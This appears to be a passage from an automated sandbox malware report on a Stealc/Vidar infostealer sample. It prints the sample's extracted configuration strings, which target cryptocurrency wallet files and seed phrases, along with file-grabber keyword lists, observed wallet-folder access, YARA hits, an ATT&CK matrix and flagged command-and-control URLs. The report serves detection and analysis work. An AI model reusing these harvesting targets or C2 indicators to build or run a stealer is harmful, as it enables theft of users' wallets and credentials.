Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,*.mp3\|
Source: file.exe, 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: ,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|2\|Windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,.mp3\|Flash\|%DRIVE_REMOVABLE%\\|wallet.,seed.,btc.,key.,2fa.,crypto.,coin.,private.,2fa.,auth.,ledger.,trezor.,pass.,wal.,upbit.,bcex.,bithimb.,hitbtc.,bitflyer.,kucoin.,huobi.,poloniex.,kraken.,okex.,binance.,bitfinex.,gdax.,ethereum.,exodus.,metamask.,myetherwallet.,electrum.,bitcoin.,blockchain.,coinomi.,words.,meta.,mask.,eth.,recovery.\|150\|3\|windows,Program Files,Program Files (x86),AppData,ProgramData,.lnk,.exe,.scr,.com,.pif,*.mp3\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: bi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 6544, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6544, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.0.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d8ecc0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2033663446.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6544, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Create Account	211 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	2 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	151 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	12 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Account Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	3 File and Directory Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	55 System Information Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://b2een.xyz/sqlite3.dll	100%	Avira URL Cloud	malware
https://b2een.xyzHJJJJKEG	0%	Avira URL Cloud	safe
https://b2een.xyztosh;	0%	Avira URL Cloud	safe
https://b2een.xyz/bi	100%	Avira URL Cloud	malware
https://b2een.xyz/	100%	Avira URL Cloud	malware
https://b2een.xyz	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
t.me	149.154.167.99	true	false		high
b2een.xyz	49.13.32.95	true	true		unknown

Contacted URLs

